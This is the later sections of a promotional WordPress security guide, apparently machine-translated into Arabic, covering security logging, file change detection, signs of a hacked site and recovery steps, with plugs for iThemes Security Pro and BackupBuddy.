إذا كنت لا تقوم بتوثيق عمليات الفحص المجدولة ، فلن يكون لديك طريقة لمعرفة ما إذا كان هناك أي فشل في المسح. قد يؤدي عدم تسجيل عمليات الفحص الفاشلة إلى التفكير في أنه يتم فحص موقعك يوميًا بحثًا عن البرامج الضارة ، ولكن في الواقع ، فشل الفحص في إكماله.

اقرأ منشور تسليط الضوء على ميزة Site Scan لتتعرف على كيفية قيام iThemes Security Pro بحمايتك من السبب الأول لاختراقات WordPress.

3. نشاط المستخدم

يمكن أن يكون الاحتفاظ بسجل لنشاط المستخدم في سجلات أمان WordPress نعمة لك بعد هجوم ناجح.

إذا كنت تراقب نشاط المستخدم الصحيح ، فيمكنه إرشادك خلال المخطط الزمني للاختراق وإظهار كل شيء غيّره المخترق ، من إضافة مستخدمين جدد إلى إضافة إعلانات صيدلانية غير مرغوب فيها على موقعك.

يراقب iThemes Security Pro 5 أنواع من نشاط المستخدم:

1. تسجيل الدخول / تسجيل الخروج

النوع الأول من نشاط المستخدم الذي يتم تسجيله هو عندما يقوم المستخدمون بتسجيل الدخول وتسجيل الخروج من موقع الويب الخاص بك ومن أين. يمكن أن تساعدك مراقبة وقت وموقع عمليات تسجيل دخول المستخدم في اكتشاف المستخدم الذي تم اختراقه. هل قام هذا المستخدم بتسجيل الدخول في وقت غير معتاد أو من مكان جديد؟ إذا كان الأمر كذلك ، فقد ترغب في بدء التحقيق معهم.

2. إنشاء المستخدم / التسجيل

النشاط التالي الذي يجب عليك الاحتفاظ بسجل له هو إنشاء المستخدم ، وخاصة إنشاء المستخدمين المسؤولين. إذا تمكن المتسلل من اختراق مستخدم شرعي ، فيمكنه إنشاء مستخدم إداري خاص به في محاولة للتستر. من السهل عليك أن تلاحظ شيئًا غريبًا في حسابك ، ولكن من الصعب تحديد نشاط ضار لمستخدم آخر.

مراقبة تسجيل المستخدم أمر ضروري أيضًا. تسمح بعض نقاط الضعف للقراصنة بتغيير دور المستخدم الافتراضي الجديد من مشترك إلى مسؤول.

إذا تم تعيين "تسجيل المستخدم" فقط لمراقبة نشاط مستخدمي المسؤولين ، فسيتم تسجيل تسجيل مستخدم المسؤول الجديد فقط في سجلات الأمان. لذلك ، إذا رأيت يومًا مستخدمًا مسجلاً حديثًا في سجلات الأمان الخاصة بك ، فقد حدث خطأ ما.

3. إضافة وإزالة الملحقات

من الأهمية بمكان عمل سجل يوضح من يقوم بإضافة الإضافات وإزالتها. بمجرد اختراق موقعك ، سيكون من السهل على المهاجم إضافة المكون الإضافي المخصص الخاص به لحقن شفرة ضارة في موقع الويب.

حتى إذا لم يكن لدى المتسلل حق الوصول إلى الخادم أو قاعدة البيانات الخاصة بك ، فقد لا يزال بإمكانهم إجراء تغييرات عليهم من لوحة معلومات WordPress الخاصة بك. باستخدام مكون إضافي ، يمكنهم إضافة عمليات إعادة توجيه إلى موقعك لاستخدامها في حملتهم التالية لتحويل البريد العشوائي ، أو إدخال برامج ضارة في قاعدة البيانات الخاصة بك. بعد تنفيذ التعليمات البرمجية الخبيثة الخاصة بهم ، يمكنهم بعد ذلك حذف المكون الإضافي لإزالة الأدلة على جرائمهم. من حسن حظنا ، أننا لن نفوت أيًا منها لأنه تم توثيقه جميعًا في سجلات أمان WordPress الخاصة بنا.

4. تبديل المواضيع

نشاط مستخدم آخر تتم مراقبته بواسطة iThemes Security Pro User Logging هو عندما يقوم شخص ما بتبديل سمة موقع الويب. إذا وجدت أن نسقك قد تغير بشكل غير متوقع ، فيمكنك البحث في سجلات أمان WordPress الخاصة بك لمعرفة من قام بالتغيير.

5. التغييرات على المشاركات والصفحات

أخيرًا ، تريد مراقبة أي تغييرات تطرأ على منشورك وصفحاتك. هل تمت إضافة أي روابط لإرسال حركة المرور الخاصة بك إلى مواقع أخرى؟ يمكن أن تساعدك مراقبة المنشورات والصفحات في العثور على أي صفحات محرجة أو روابط ضارة تمت إضافتها إلى موقع الويب الخاص بك بعد الخرق.

لمعرفة المنشور الذي تم تعديله ، انقر فوق روابط عرض التفاصيل للعثور على معرف المنشور.

تحقق من منشور تسليط الضوء على ميزة تسجيل المستخدم لمعرفة المزيد حول كيف يمكن أن تساعدك مراقبة نشاط المستخدم على العودة من الاختراق.

تغليف

يعد التسجيل غير الكافي أحد أكبر 10 مخاطر لأمان تطبيقات الويب في OWASP. ستساعدك مراقبة السلوك الصحيح في تحديد الهجمات وإيقافها ، واكتشاف الاختراق ، والوصول إلى الضرر الذي لحق بموقعك على الويب وإصلاحه بعد هجوم ناجح.

القسم 10: عند وقوع كارثة أمنية في WordPress

حتى إذا اتبعت أفضل ممارسات الأمان في WordPress ، فلا تزال هناك فرصة لتعرض موقعك للاختراق. يعني الاختراق أن أحد المتطفلين اخترق موقع الويب الخاص بك وأصابه ببرامج ضارة.

ما هو الخرق الأمني؟

الخرق الأمني ​​هو عندما يكون المجرم الإلكتروني قادرًا على الوصول غير المصرح به إلى موقع الويب أو الخادم الخاص بك. يمكن أن تحدث الانتهاكات الأمنية بعدة طرق مختلفة ، حيث يستغل المتسللون بعضًا من أكثر مشكلات أمان WordPress شيوعًا. من تشغيل الإصدارات القديمة من المكونات الإضافية والسمات إلى عمليات إدخال SQL الأكثر تعقيدًا ، يمكن أن يحدث خرق أمني حتى لأصحاب المواقع الأكثر يقظة.

حان الوقت لاكتشاف خرق أمني: عامل رئيسي في تنظيف موقع ويب مصاب

هل تعلم أن متوسط ​​الوقت المستغرق لاكتشاف خرق لموقع الويب هو 200 يوم؟ لسوء الحظ ، كلما طال الوقت الذي تستغرقه في ملاحظة الاختراق ، زاد الضرر الذي يمكن أن يلحقه المتسلل بموقعك على الويب وعملائك وبك. يمكن أن يتسبب جزء من البرامج الضارة في حدوث قدر هائل من الضرر في 200 يوم. لهذا السبب من المهم للغاية تقليل الوقت المستغرق لاكتشاف الخرق الأمني.

لماذا ا؟ التنظيف ووقت التعطل الذي ستحتاجه لتنظيف موقع الويب الخاص بك بعد تلف بقيمة 200 يوم أمر مذهل أيضًا. يزداد وقت التحقيق في كل شيء لمسته البرامج الضارة وأي بيانات العميل تمت سرقتها بينما يظل الاختراق غير مكتشف. ناهيك عن الوقت الذي يجب أن تقضيه في إبلاغ العملاء بأنهم بحاجة إلى إلغاء بطاقات الائتمان الخاصة بهم لأن أحد المتطفلين قام بتسجيل جميع ضغطات المفاتيح الخاصة به أثناء زيارته لموقع الويب الخاص بك.

تكلفة الحصول على القرصنة كبيرة. عليك أن تدفع لشخص ما للتحقيق في الانتهاك وتنظيف موقع الويب الخاص بك. سيتعين على أخصائي إصلاح الاختراق إزالة موقع الويب الخاص بك أثناء عمله ، ولن يتمكن الأشخاص من إجراء عمليات شراء جديدة أثناء تعطل موقع الويب الخاص بك. بعد أن تفقد ثقة عميلك ، من المحتمل أن تخسر أي مشتريات مستقبلية كان سيقدمها لك.

تكلفة الاختراق هي سبب أهمية ملاحظة الاختراق في أسرع وقت ممكن. كلما اكتشفت الاختراق بشكل أسرع ، زادت سرعة إيقاف حدوث أي ضرر آخر ، وكلما زادت سرعة إعادة موقعك على الويب وعملك عبر الإنترنت.

هل الماسحات الضوئية كافية؟

توفر الماسحات الضوئية للبرامج الضارة طريقة لفحص موقع WordPress الخاص بك بحثًا عن الملفات والبرامج النصية الضارة المعروفة. ولكن هل الماسحات الضوئية للبرامج الضارة كافية لاكتشاف أي اختراق أمني؟

في كلمة لا. لا تعتقد أنه يمكنك الاعتماد فقط على ماسح البرامج الضارة للتحقق مما إذا كان موقع الويب الخاص بك مصابًا. لا يوجد ماسح ضوئي للبرامج الضارة يمكنه تحديد كل جزء من البرامج الضارة الموجودة. إذا صادفت ماسحًا ضوئيًا للبرامج الضارة يدعي أنه دقيق بنسبة 100٪ ، فيجب عليك تشغيله لأن عمليات الفحص التي تقدم ادعاءات مثل هذه غالبًا ما تكون الأقل دقة.

التوقيع مقابل الكشف عن البرامج الضارة السلوكية

تستخدم غالبية عمليات فحص البرامج الضارة وبرامج مكافحة الفيروسات توقيعات البرامج الضارة لاكتشاف البرامج الضارة. ستستخدم عمليات فحص البرامج الضارة الأكثر تقدمًا مزيجًا من اكتشاف التوقيع والتحليل السلوكي.

تواقيع البرامج الضارة

توقيع البرامج الضارة عبارة عن سلسلة من وحدات البايت المستخدمة لتحديد الأجزاء المعروفة من البرامج الضارة. يتم تشغيل بعض أدوات فحص البرامج الضارة بواسطة قاعدة بيانات مليئة بتوقيعات البرامج الضارة لملايين الفيروسات المعروفة.

يعد فحص البرامج الضارة المستند إلى التوقيع سريعًا وبسيطًا وسيكتشف 100٪ من البرامج الضارة المعروفة والمفهومة جيدًا. كل هذا رائع وسوف يلتقط البرامج الضارة التي أضافها المتسللون من المستوى المنخفض.

ومع ذلك ، يعرف المتسللون المهرة أن الماسحات الضوئية للبرامج الضارة تتحقق من تواقيع البرامج الضارة المعروفة. يتمتع هؤلاء المتسللون بالقدرة على التعتيم على توقيعات البرامج الضارة لتظل غير مكتشفة بواسطة الماسح الضوئي العادي.

يتم إطلاق برامج ضارة جديدة بمعدل لا تستطيع ماسحات البرامج الضارة الحفاظ على تحديث قاعدة البيانات الخاصة به مع أحدث التوقيعات. لذلك لن يتمكن الماسح الضوئي المستند إلى التوقيع من معرفة الفرق بين جزء جديد من البرامج الضارة وملف readme.txt الخاص بالمكوِّن الإضافي.

التحليل السلوكي

يفحص التحليل السلوكي إجراءات البرنامج لتحديد ما إذا كانت ضارة. هناك الكثير من أنواع السلوكيات المختلفة التي يمكن اعتبارها مشبوهة أو خبيثة. على سبيل المثال ، يستفيد برنامج iThemes Security Pro Site Scan من واجهة برمجة تطبيقات التصفح الآمن من Google للمساعدة في الحفاظ على أمان مواقع الويب. سيتحقق التصفح الآمن من Google لمعرفة ما إذا كان برنامج ما يعيد توجيه حركة المرور إلى موقع ضار معروف.

مرة أخرى ، لا توجد طريقة مضمونة لاكتشاف البرامج الضارة. لكن مجموعة من عمليات التحقق السلوكية والتوقيع ستزيد بشكل كبير من فرص تنبيهك إلى دليل على وجود خرق أمني.

ما السلوك الذي تشاركه كل البرامج الضارة؟

نحن نعلم مدى أهمية اكتشاف خرق أمني في أسرع وقت ممكن ، وأن الاعتماد فقط على اكتشاف البرامج الضارة ليس كافيًا. لذلك تساءلنا كيف يمكن أن يقلل iThemes Security Pro الوقت الذي يستغرقه الأشخاص لاكتشاف انتهاكات الأمان على مواقعهم على الويب؟

في حين أن نوع الضرر الذي تسببه البرامج الضارة على موقع الويب الخاص بك يختلف اختلافًا كبيرًا ، يمكن اختصار ما تفعله في واحد أو مجموعة من الأشياء الثلاثة التالية.

1. إضافة ملفات - يمكن أن تضيف البرامج الضارة في شكل برامج تجسس ملفًا ضارًا يسجل ضغطات المفاتيح التي يقوم بها العميل عند إدخال معلومات بطاقة الائتمان الخاصة به.
2. إزالة الملفات - تقوم بعض البرامج الضارة بإزالة ملف شرعي واستبداله بملف ضار يحمل نفس الاسم.
3. تعديل الملفات - ستحاول البرامج الضارة إخفاء رمزها الضار عن طريق إخفائها في ملف موجود يعدّله.

ألن يكون من اللطيف أن يتم تنبيهك بالتغييرات غير المتوقعة على موقع الويب الخاص بك حتى تتمكن من فحصها بحثًا عن علامات على وجود خرق أمني؟

كيفية تقليل الوقت المستغرق لاكتشاف خرق أمني

مفتاح اكتشاف الخرق الأمني ​​بسرعة هو مراقبة تغييرات الملفات على موقع الويب الخاص بك.

ستعمل ميزة اكتشاف تغيير الملف في iThemes Security Pro على فحص ملفات موقع الويب الخاص بك وتنبيهك عند حدوث تغييرات على موقع الويب الخاص بك.

هناك العديد من الأسباب المشروعة التي قد تجعلك ترى نشاطًا جديدًا لتغيير الملف في سجلاتك ، ولكن إذا كانت التغييرات التي تم إجراؤها غير متوقعة ، فيجب أن تأخذ الوقت الكافي للتأكد من أن التغييرات لم تكن ضارة. على سبيل المثال ، إذا رأيت تغييرًا تم إجراؤه على مكون إضافي في نفس التاريخ والوقت الذي قمت فيه بتحديث المكون الإضافي ، فلن يكون هناك سبب للتحقيق.

كيفية تمكين اكتشاف تغيير الملف في iThemes Security Pro

لبدء مراقبة تغييرات الملفات ، قم بتمكين File Change Detection في الصفحة الرئيسية لإعدادات الأمان.

بمجرد تمكين File Change Detection ، سيبدأ iThemes Security Pro في فحص جميع ملفات موقع الويب الخاص بك في أجزاء . سيساعد فحص ملفاتك في مجموعات على تقليل الموارد المطلوبة لمراقبة تغييرات الملفات.

سيؤدي الفحص الأولي لتغيير الملف إلى إنشاء فهرس لملفات موقع الويب الخاص بك وتجزئة ملفاتها. تجزئة الملف هي نسخة مختصرة وغير بشرية من محتوى الملف.

بعد اكتمال الفحص الأولي ، سيستمر iThemes Security Pro في فحص ملفك على أجزاء. إذا تغيرت تجزئة الملف في إحدى عمليات الفحص اللاحقة ، فهذا يعني أن محتويات الملف قد تغيرت.

يمكنك أيضًا تشغيل تغيير يدوي للملف بالنقر فوق الزر Scan Files Now في إعدادات File Change Detection

تنشيط رسائل البريد الإلكتروني الخاصة بإشعار تغيير الملف

تحدث تغييرات الملف طوال الوقت ، وسرعان ما يصبح الحصول على تنبيه عبر البريد الإلكتروني لكل تغيير أمرًا مربكًا. وقبل أن تعرفه ، يصبح الفتى الذي يبكي حالة الذئب ، وتبدأ في تجاهل تنبيهات تغيير الملف تمامًا.

دعنا نلقي نظرة على كيفية تحديد iThemes Security Pro بذكاء التغييرات الشرعية لتقليل الإشعارات وكيف يمكنك كتم الإشعارات للملفات التي يُتوقع تحديثها بشكل متكرر.

يمكنك إدارة جميع إشعارات أمان iThemes من مركز الإشعارات داخل المكون الإضافي iThemes Security. من لوحة تحكم مسؤول WordPress الخاصة بك ، قم بزيارة الأمان> الإعدادات وحدد موقع وحدة مركز الإشعارات .

كيف يتعرف iThemes Security Pro على تغييرات الملفات المشروعة

هناك طريقتان يمكن من خلال iThemes Security Pro اكتشاف ما إذا كان التغيير الذي تم إجراؤه على الملف مشروعًا وليس سببًا للقلق. لن يقوم iThemes Security Pro بإنشاء إشعار تغيير الملف للتغييرات التي يمكنه التحقق منها.

1. استكمال تحديثات البرنامج المساعد / الموضوع بواسطة إدارة الإصدار

تتيح لك ميزة إدارة الإصدار في iThemes Security Pro التحديث التلقائي لـ WordPress والمكونات الإضافية والسمات.

في حالة اكتمال التحديث بواسطة إدارة الإصدار ، سيعرف iThemes Security Pro مصدر التحديث ولن يطلق تنبيهًا.

2. مقارنة ملف ل iThemes الإضافات والسمات

حدد المربع مقارنة الملفات عبر الإنترنت في إعدادات الكشف عن تغيير الملف لتمكين مقارنة الملفات عبر الإنترنت.

في أي وقت يتم فيه تغيير ملف على موقع الويب الخاص بك ينتمي إلى مكون إضافي أو سمة iThemes ، ستتم مقارنته بملف موجود على خادم iThemes. إذا تطابق تجزئة إصدار الملف على موقع الويب الخاص بك بين التجزئة والإصدار الموجود على خادم iThemes ، فسيكون هذا تغييرًا شرعيًا ، ولن تتلقى تنبيهًا.

3. مقارنة ملفات WordPress.org عبر الإنترنت

إذا تم تغيير ملف WordPress الأساسي أو المكون الإضافي المثبت من مستودع WordPress.org ، فستتم مقارنة الملف بالإصدار الموجود على WordPress.org. إذا تطابقت التجزئة ، فلن تكون التغييرات ضارة ، ولن تتلقى تنبيهًا.

4. الاستبعادات اليدوية

يمكنك استبعاد الملفات والدلائل وأنواع الملفات من File Change Detection في إعدادات File Change Detection.

القاعدة العامة هي أنه من المقبول استبعاد الملفات التي تعرف أنه سيتم تحديثها بانتظام. تعد ملفات النسخ الاحتياطي وذاكرة التخزين المؤقت مثالًا رائعًا على ذلك. سيؤدي استبعاد هذه الأنواع من الملفات إلى تهدئة الكثير من الضوضاء الإضافية.

7 علامات تم اختراق موقع الويب الخاص بك على WordPress

تجد نفسك تسأل ، " هل موقع WordPress الخاص بي مخترق؟ "يعني أنك ستحتاج إلى بعض الإجابات السريعة.

كلما لاحظت علامات اختراق موقع الويب بشكل أسرع ، زادت سرعة تنظيف موقعك. كلما أسرعت في تنظيف موقع الويب الخاص بك ، قل الضرر الذي يمكن أن يلحقه الاختراق بموقعك على الويب.

1. صفحتك الرئيسية مختلفة

تبدو التغييرات على صفحتك الرئيسية كعلامة واضحة. ولكن كم مرة تقوم بالفعل بإجراء فحص شامل أو صفحتك الرئيسية؟ أعلم أنني عادة ما أذهب مباشرة إلى عنوان URL الخاص بتسجيل الدخول وليس عنوان URL الخاص ببيتي. من هناك ، أقوم بتسجيل الدخول أو تحديث موقعي أو تحرير منشور. بعد أن أنهي ما جئت من أجله ، غالبًا ما أغادر دون النظر إلى الصفحة الرئيسية لموقع الويب الخاص بي.

الهدف الأساسي من بعض عمليات الاختراق هو التصيد على موقع ويب أو اكتساب سمعة سيئة. لذلك يغيرون صفحتك الرئيسية فقط إلى شيء يجدون أنه مضحك أو يتركون بطاقة مخترقة عن طريق الاتصال.

إذا لاحظت حدوث تغيير في صفحتك الرئيسية ، فيمكنك استعادة موقع الويب الخاص بك بسرعة وسهولة باستخدام ملف نسخ احتياطي تم إنشاؤه باستخدام مكون إضافي موثوق به للنسخ الاحتياطي في WordPress مثل BackupBuddy.

2. انخفض أداء موقع الويب الخاص بك

قد يشعر موقعك بالركود عندما يكون مصابًا بعدوى. يمكنك مواجهة تباطؤ على موقع الويب الخاص بك إذا كنت تواجه هجمات القوة الغاشمة أو إذا كان هناك نص برمجي ضار يستخدم موارد الخادم الخاص بك لتعدين العملات المشفرة. وبالمثل ، يحدث هجوم DDoS (أو هجوم رفض الخدمة ) عندما ترسل شبكة من عناوين IP طلبات في نفس الوقت إلى موقع الويب الخاص بك في محاولة للتسبب في تعطله.

3. يحتوي موقع الويب الخاص بك على إعلانات منبثقة ضارة أو غير مرغوب فيها

هناك فرصة جيدة لقيام أحد المتطفلين باختراق موقع الويب الخاص بك إذا رأى زوار موقعك النوافذ المنبثقة التي تعيد توجيههم إلى موقع ويب ضار. الهدف من هذا النوع من الهجوم هو توجيه حركة المرور بعيدًا عن موقعك إلى موقع المهاجم حتى يتمكنوا من استهداف المستخدمين بنقر الاحتيال لإعلان الدفع لكل نقرة.

الشيء الأكثر إحباطًا في هذا النوع من الاختراق هو أنك قد لا تتمكن من رؤية النوافذ المنبثقة. يمكن تصميم اختراق النوافذ المنبثقة بحيث لا يظهر للمستخدمين الذين قاموا بتسجيل الدخول ، مما يقلل من احتمالات رؤيتهم من قبل مالكي مواقع الويب. لذلك حتى عندما يقوم مالك الموقع بتسجيل الخروج ، لن يتم عرض النوافذ المنبثقة أبدًا.

يمكن أيضًا تقييد عرضك للنوافذ المنبثقة إذا كنت تستخدم ملحقًا لحظر الإعلانات في متصفحك. على سبيل المثال ، أبلغ أحد العملاء عن اختراق للنوافذ المنبثقة ولقطات شاشة مشتركة وفيديو للنوافذ المنبثقة. بعد أن أمضيت ساعات في تصفح موقعهم على الويب ، لم أتمكن من إعادة إنشاء أي شيء كانوا يبلغون عنه. كنت مقتنعا أن جهاز الكمبيوتر الشخصي الخاص بهم قد تم اختراقه وليس موقع الويب.

أخيرًا ، اتضح لي سبب عدم تمكني من رؤية النوافذ المنبثقة. لقد قمت بتثبيت ملحق Adblocker على متصفحي. بمجرد تعطيل إضافة أداة حظر الإعلانات ، تمكنت من رؤية النوافذ المنبثقة في كل مكان. أشارك هذه القصة المحرجة لإنقاذك من الوقوع في نفس الخطأ ، على أمل.

4. لاحظت انخفاضًا في حركة مرور الموقع

إذا قمت بتسجيل الدخول إلى حساب Google Analytics الخاص بك ولاحظت انخفاضًا حادًا في حركة مرور موقع الويب ، فقد يتم اختراق موقع WordPress الخاص بك. انخفاض في حركة المرور على الموقع يستحق التحقيق. قد يكون هناك نص برمجي ضار على موقعك يعيد توجيه الزائرين بعيدًا عن موقعك أو يمكن لـ Google بالفعل من خلال إدراج موقع الويب الخاص بك في القائمة السوداء كموقع ضار.

أول شيء تريد البحث عنه هو حركة المرور الصادرة لموقعك على الويب. من خلال تتبع موقع الويب الخاص بك باستخدام Google Analytics ، ستحتاج إلى تكوين موقعك لتتبع حركة المرور التي تغادر موقعك. أسهل طريقة لمراقبة حركة المرور الصادرة على موقع WordPress الخاص بك هي استخدام مكون WordPress Google Analytics الإضافي.

6. المستخدمون الجدد غير المتوقعين

إذا كان موقع الويب الخاص بك يحتوي على أي تسجيلات غير متوقعة لمستخدمين إداريين جدد ، فهذه علامة أخرى على اختراق موقع WordPress الخاص بك. من خلال استغلال مستخدم مخترق ، يمكن للمهاجم إنشاء مستخدم إداري جديد. من خلال امتيازات المسؤول الجديدة الخاصة بهم ، يكون المخترق جاهزًا لإحداث بعض الأضرار الجسيمة بموقعك.

هل تتذكر المكون الإضافي WP GDPR Compliance من وقت سابق؟ في تشرين الثاني (نوفمبر) 2018 ، تلقينا عدة تقارير عن إنشاء مستخدمين إداريين جدد على مواقع العملاء. استخدم المتسللون ثغرة أمنية في المكون الإضافي WP GDPR Compliance (تم تصحيح الثغرة الأمنية في الإصدار 1.4.3) لإنشاء مستخدمين إداريين جدد على مواقع WordPress التي تشغل المكون الإضافي. سمح استغلال المكون الإضافي للمستخدمين غير المصرح لهم بتعديل تسجيل المستخدم لتغيير دور المستخدم الجديد الافتراضي من مشترك إلى مسؤول. لسوء الحظ ، لم تكن هذه هي الثغرة الأمنية الوحيدة ولا يمكنك فقط إزالة المستخدمين الجدد الذين أنشأهم المهاجم وتصحيح المكون الإضافي.

إذا تم تثبيت WP GDPR Compliance و WooCommerce ، فربما تم حقن موقعك بشفرة ضارة. يمكن للمهاجمين استخدام مثبت الخلفية WooCommerce plugin لإدراج مثبت خلفي في قاعدة البيانات. إذا كان موقعك يحتوي على باب خلفي مثبت ، فيجب عليك الاتصال بأخصائي إصلاح الاختراق. خيار آخر هو استخدام ملف النسخ الاحتياطي للتراجع إلى نسخة من موقع الويب الخاص بك قبل الاختراق باستخدام نسخة احتياطية سابقة.

7. إزالة المستخدمين المسؤولين

إذا لم تتمكن من تسجيل الدخول إلى موقع WordPress الخاص بك ، حتى بعد إعادة تعيين كلمة المرور ، فقد يكون ذلك علامة خطيرة على الإصابة.

عندما تم اختراق Gentoo Github repo ، كان أول شيء فعله المهاجم هو حذف جميع المستخدمين الإداريين. إذن كيف دخل هذا المخترق إلى حساب Github الخاص بهم؟ تم اكتشاف كلمة مرور مستخدم مشرف Gentoo على موقع مختلف. أظن أنه تم اكتشاف اسم المستخدم وكلمة المرور إما من خلال الكشط أو تفريغ قاعدة البيانات.

على الرغم من أن كلمة مرور المسؤول لحساب Gentoo Github كانت مختلفة عن تلك المستخدمة في الحساب المخترق ، إلا أنها كانت متشابهة جدًا. لذلك سيكون هذا مثلي باستخدام iAmAwesome2020 ككلمة مرور في حساب واحد و iAmAwesome2021 على موقع آخر. لذلك تمكن المتسللون من معرفة كلمة المرور بجهد بسيط. كما نرى ، يجب عليك استخدام كلمة مرور فريدة لكل حساب. لا يكفي الاختلاف البسيط في كلمات مرورك. باستخدام LastPass ، يمكنك إنشاء كلمات مرور قوية وفريدة من نوعها وتخزينها بشكل آمن لكل موقع.

كيف نعود من الكارثة

إذا كنت تشك في حدوث خرق ، فهناك بعض الخطوات السريعة التي يمكنك اتخاذها لتخفيف الضرر.

استعادة نسخة احتياطية سابقة / نظيفة لموقعك

الطريقة الأكثر تأكيدًا للتراجع عن الخرق الأمني ​​هي استعادة موقعك مرة أخرى إلى إصدار سابق ، قبل الهجوم. لهذا السبب يعد وجود حل نسخ احتياطي شامل في WordPress أمرًا في غاية الأهمية. نوصي باستخدام BackupBuddy لجدولة النسخ الاحتياطية للتشغيل تلقائيًا بحيث يكون لديك دائمًا نسخة احتياطية.

فقط لاحظ أن استعادة نسخة احتياطية سابقة قد تترك موقعك عرضة لنفس الاختراق ، لذلك من المهم أيضًا اتباع هذه الخطوات.

قم بتحديث جميع المكونات الإضافية والسمات القديمة على الفور

قد يكون المكوِّن الإضافي أو السمة الضعيفة هي السبب ، لذلك من المهم تحديث جميع المكونات الإضافية أو السمات القديمة على الفور. حتى إذا استعدت إلى إصدار نظيف سابق من موقع الويب الخاص بك ، فستظل نفس نقاط الضعف موجودة ويمكن اختراقها مرة أخرى.

قد ترغب أيضًا في التحقق من عدم تشغيل مكون إضافي أو سمة لا تزال بدون تصحيح من المطور. سوف تحتاج إلى إزالة هذا البرنامج المساعد على الفور.

تمكين المصادقة الثنائية

إذا كنت لا تستخدم المصادقة ذات العاملين لتأمين تسجيلات دخول المسؤول ، فقم بتنشيطها على الفور. ستساعد طبقة الأمان المضافة هذه على التأكد من أن المستخدمين غير المصرح لهم لا يمكنهم اختراق أي حسابات مشرف.

اطلب المساعدة لإزالة البرامج الضارة بشكل احترافي

تحدث انتهاكات أمان WordPress على مستوى الخادم (أعمق من تثبيت WordPress الخاص بك) ، لذلك قد تحتاج إلى الاتصال بخدمة إزالة البرامج الضارة المحترفة. نوصي باستخدام WeWatchYourWebsite لإزالة البرامج الضارة بشكل احترافي.

الختام: دليل أمان WordPress النهائي

في دليل أمان WordPress هذا ، قمنا بتغطية الكثير! ولكن باتباع النصائح الواردة في هذا الدليل ، ستحظر ما يقرب من 100٪ من الهجمات التي تُفرض على موقع الويب الخاص بك.

يمكن أن يساعد المكون الإضافي لأمان WordPress في تأمين موقع WordPress الخاص بك

مقترنًا بمعرفة موضوعات أمان WordPress في هذا الدليل ، يمكن أن يساعد مكون أمان WordPress الإضافي في تأمين موقع WordPress الخاص بك. يوفر iThemes Security Pro ، المكون الإضافي لأمان WordPress ، أكثر من 50 طريقة لتأمين وحماية موقع الويب الخاص بك من الثغرات الأمنية الشائعة في WordPress. باستخدام WordPress والمصادقة الثنائية وحماية القوة الغاشمة وفرض كلمة مرور قوية وغير ذلك ، يمكنك إضافة طبقة إضافية من الأمان إلى موقع الويب الخاص بك.

مايكل مور

كل أسبوع ، يضع مايكل تقرير WordPress Vulnerability Report معًا للمساعدة في الحفاظ على أمان مواقعك. بصفته مدير المنتجات في iThemes ، فهو يساعدنا في مواصلة تحسين مجموعة منتجات iThemes. إنه الطالب الذي يذاكر كثيرا عملاقًا ويحب التعرف على كل ما يتعلق بالتكنولوجيا ، القديم والجديد. يمكنك أن تجد مايكل يتسكع مع زوجته وابنته ، يقرأ أو يستمع إلى الموسيقى عندما لا يعمل.